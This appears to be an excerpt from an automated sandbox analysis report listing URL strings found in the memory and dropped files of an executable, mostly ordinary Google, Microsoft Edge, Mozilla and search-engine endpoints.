Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: HrxOpVxK5d.exe, HrxOpVxK5d.exe, 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1798530250.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: EBFBKKJE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chromecache_467.11.dr, chromecache_465.11.dr	String found in binary or memory: https://apis.google.com
Source: msedge.exe, 0000000D.00000002.1508651190.000001D4FC797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 3fab6aa4-1f6e-478f-a63e-aea6a08dab0f.tmp.16.dr, ef5b2e32-6c84-4fec-be75-e23c809cf8d0.tmp.16.dr	String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://c.msn.com/
Source: EBFBKKJE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000008.00000003.1349125008.00000F9C02EB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1510501728.000015280237C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: manifest.json.15.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: chrome.exe, 00000008.00000003.1322526154.00000F9C02F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1338398569.00000F9C02F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323176156.00000F9C026AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1325961701.00000F9C02F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349125008.00000F9C02EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000008.00000003.1314706623.00005650006B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000008.00000003.1314706623.00005650006B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.1314419021.000056500039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1314219078.0000565000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349874385.000056500080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: msedge.exe, 0000000D.00000002.1510501728.000015280237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.15.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 3fab6aa4-1f6e-478f-a63e-aea6a08dab0f.tmp.16.dr, ef5b2e32-6c84-4fec-be75-e23c809cf8d0.tmp.16.dr	String found in binary or memory: https://clients2.google.com
Source: chrome.exe, 00000008.00000003.1309699415.000068A8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1309738994.000068A8002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000008.00000003.1348308700.00000F9C02DE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1322387314.00000F9C02DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1385533233.00000F9C02DE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1329487256.00000F9C02DE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1358761602.00000F9C02DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323248594.00000F9C02DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1345735370.00000F9C02DE0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1509660870.0000152802240000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.15.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 3fab6aa4-1f6e-478f-a63e-aea6a08dab0f.tmp.16.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: HrxOpVxK5d.exe, HrxOpVxK5d.exe, 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799365474.000000006D8B1000.00000002.00000001.01000000.00000007.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log7.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log7.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr, HubApps Icons.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log7.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
